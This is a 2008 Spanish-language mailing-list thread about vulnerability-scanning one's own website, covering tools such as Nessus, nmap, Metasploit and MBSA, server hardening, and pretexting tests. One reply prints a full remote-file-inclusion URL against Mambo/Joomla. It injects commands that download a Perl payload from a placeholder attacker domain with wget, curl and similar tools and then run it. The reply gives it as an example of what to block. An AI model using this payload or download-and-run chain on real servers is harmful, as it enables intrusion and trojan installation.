Ethical Hacking, aspectos a considerar.
Alberto Rivera
rivera.alberto en gmail.com
Lun Ene 21 12:01:29 CLST 2008
Claudio Salazar S. wrote:
> Alberto Rivera wrote:
>> Asdtaker wrote:
>>> Estimados, alguien tiene idea de los aspecto de debiese considerar a
>>> la hora
>>> de realizar un escaneo de vulnerabilidades a mi sitio web?
>>>
>>> Por ahora considero estos ITEMs:
>>>
>>> - Ingenieria Social: informacion disponible en la web.
>>> - Archivos por defecto: todo aquello que viene con la instalacion en
>>> bruto
>>> del server web.
>>> - Extensiones por defecto: analizar el impacto de soportar distintas
>>> extensiones.
>>> - Sesiones: comprobar validez de sesiones, etc.
>>> - Manejo de errores: de aplicacion y servidor.
>>> - SQL Injection.
>>>
>>>
>>> Gracias por sus comentarios.
>>>
>> Mira toma nessus y lo corres desde el exterior y después desde el
>> interior de la organización esto te va a encontrar varias
>> vulnerabilidades y sus niveles de vulnerabilidad, luego tomas nmap y
>> tratar de insertar exploits conocidos a servicios conocidos desde
>> dentro y afuera cada vez, prueba varias herramientas en contra de tu
>> sitio, trata de explotarlo de forma controlada, o sea, no lo hagas
>> cuando estén todos trabajando ... esto te va a entregar una visión
>> un poco más específica de cualquier problemática que puedas tener.
>
> Metasploit tiene buen desarrollo ahora.
No sé si te refieres al metasplist msfencode??? si es así en realidad
están super avanzados ...
> Tambien una utilidad que tiene la gente de Microsoft
> MBSA (Microsoft Baseline Analyzer)
... tengo malas experiencias por el cuento de los rpc con esta
herramienta, pero creo que hay otro software que se llama visio o algo
así que logra, según mi percepción, dejar el software más estable, yo
probé estas herramientas hace un tiempo y las dejé de lado, de hecho
deje todos los nt's (aunque era muy bueno), 2000 y 2003 server de lado y
ahora hago todo con linux, ya que aunque no se quiera siempre es más
seguro y no hay que estar tan pendiente de todo ...
>
> http://www.microsoft.com/spain/technet/seguridad/herramientas/mbsa.mspx
>
>> Ahora para el desarrollo propiamente tal, prueba inyecciones de
>> mysql, php y vulnerabilidades de javascript o ajax o lo que tengas,
>> para hacer inyecciones de forma remota hay varias formas de hacerlo y
>> están super documentadas incluso en youtube puedes encontrar videos
>> bastante buenos ... a nivel de servidor elimina cualquier software
>> que sirva para bajar cosas del internet para que no te puedan
>> ejecutar ningún código dentro de la máquina
>
> Borrar ftp ?
> Un atacante con habilidades te crea un socket en ASP y adios downloaders.
si pero es basante más complejo y requiere de muchos más permisos que si
utiliza la mismas herramientas del sistema, de hecho cuando se basurea
para ver sobre que máquina se está, lo primero es ver qué servicios
tiene, que versión del software, se buscan los exploits ... o sea,
mientras menos cosas tenga un servidor de producción mejor...
>
>> y para que imposibilites a los atacantes a hacer cosas como esta :
>>
>> http://tudominio/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=
>>
>> 1&GLOBALS=&mosConfig_absolute_path=http://dominiousadoporelatacante/directorioherramientas/tool25.txt?&cmd=cd%20/tmp;
>>
>> wget%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>>
>> curl%20-O%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>>
>> lwp-download%20-a%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>>
>> GET%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>> lynx%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>>
>> links%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>>
>> perl%20spkat.txt
>>
>
> Eso son casos especificos de explotacion de Mambo o Joomla con RFI. Él
> dejo en claro hace rato que esta trabajando con IIS, asi que los wget,
> curl -O, etc( que hacen lo mismo ), no tendrian validez, aunque
> explotaciones de RFI sobre Windows dan resultado pero son un poco mas
> rebuscadas.
así tienes razón ... esto es para joomla y mambo, pero también funciona
sobre otros cms y modificando algunas cosas también funcionan sobre
desarrollos propietarios, de hecho creo que modificando esto igual cae
un IIS o una aplicación sobre asp por ejemplo.
salu2 again =)
>
>
>> si te fijas aquí el atacante no se fija ni en ingeniería social ni en
>> datos de ningún tipo sólo hace un ataque vía sitio web, y ve si tu
>> sitio tiene permiso de ejecutar cualquiera de las aplicaciones de
>> descarga o navegación, con esto baja un paquete, para el ejemplo
>> spkat.txt y después lo ejecuta con perl. El spkat lo que hace es
>> abrir puertos, levantar servicios, ejecutar troyanos dentro de la
>> máquina o cualquier cosa ....
>>
>> Ahora lo de la ingeniera social es para cuestiones super puntuales
>> por ejemplo, para conseguir acceso a un sistema en red, por ejemplo
>> llamas a la secretaria de administración y le dices que eres el
>> gerente de operaciones y le pides un nombre de usuario y password del
>> sistema, así puedes ver realmente cual es el nivel de seguridad que
>> cuentas de parte de los usuarios ... pero la ing. social no es
>> encontrar información en internet.
>>
>> eso, espero te sirva
>>
>> salu2
>>>
>>>
>>>
>
>
>
Más información sobre la lista de distribución Linux